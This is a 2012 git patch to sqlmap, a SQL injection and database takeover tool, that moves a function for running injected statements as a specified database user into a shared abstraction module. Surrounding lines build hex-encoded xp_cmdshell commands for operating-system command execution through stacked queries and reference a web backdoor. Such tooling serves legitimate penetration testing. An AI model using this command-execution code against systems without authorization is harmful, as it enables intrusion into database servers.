From add83528045c62676985c3792f8d8507059b1074 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Mon, 2 Jul 2012 02:14:03 +0100
Subject: [PATCH] make the runAsDBMSUser() generic and ported to abstraction.py
 so the same function will be used for PostgreSQL dblink() too

---
 lib/takeover/abstraction.py | 16 ++++++++++++++++
 lib/takeover/xp_cmdshell.py | 18 +-----------------
 2 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 877acc92b..8b2fbbaf9 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -16,6 +16,7 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@@ -37,6 +38,21 @@ class Abstraction(Web, UDF, xp_cmdshell):
         Web.__init__(self)
         xp_cmdshell.__init__(self)
 
+    def runAsDBMSUser(self, query):
+        if conf.dCred:
+            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
+                for sqlStatement in sqlStatements:
+                    if query.lower().startswith(sqlStatement):
+                        sqlType = sqlTitle
+                        break
+
+            if sqlType and "SELECT" not in sqlType:
+                query = "SELECT 1;%s" % query
+
+            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
+
+        return query
+
     def execCmd(self, cmd, silent=False):
         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
             self.webBackdoorRunCmd(cmd)
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 346d20669..d4b9cac86 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -21,7 +21,6 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import HASHDB_KEYS
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import SQL_STATEMENTS
 from lib.core.threads import getCurrentThreadData
 from lib.core.unescaper import unescaper
 from lib.request import inject
@@ -148,21 +147,6 @@ class xp_cmdshell:
         if cmd:
             self.xpCmdshellExecCmd(cmd)
 
-    def xpCmdshellForgeRunAs(self, query):
-        if conf.dCred:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT 1;%s" % query
-
-            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
-
-        return query
-
     def xpCmdshellForgeCmd(self, cmd):
         self.__randStr = randomStr(lowercase=True)
         self.__cmd = "0x%s" % hexencode(cmd)
@@ -170,7 +154,7 @@ class xp_cmdshell:
         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
-        return self.xpCmdshellForgeRunAs(self.__forgedCmd)
+        return self.runAsDBMSUser(self.__forgedCmd)
 
     def xpCmdshellExecCmd(self, cmd, silent=False):
         cmd = self.xpCmdshellForgeCmd(cmd)